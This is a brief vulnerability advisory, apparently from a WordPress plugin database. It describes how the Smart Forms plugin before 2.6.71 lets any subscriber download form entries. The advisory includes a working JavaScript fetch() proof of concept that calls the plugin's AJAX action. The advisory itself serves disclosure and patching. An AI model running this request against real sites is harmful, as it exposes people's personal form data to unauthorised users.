WordPress Plugin Vulnerabilities

Smart Forms < 2.6.71 - Subscriber+ Form Data Download

Description

The plugin does not have authorisation in its rednao_smart_forms_entries_list AJAX action, allowing any authenticated users, such as subscriber, to download arbitrary form's data, which could include sensitive information such as PII depending on the form.

Proof of Concept

Execute the below command in the web developer console of the browser when being logged in as a subscriber:

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": new URLSearchParams({"action":"rednao_smart_forms_entries_list","data":'{"Form":"1"}'}),
  "method": "POST",
  "credentials": "include"
})
  .then(response => response.text())
  .then(data => console.log(data));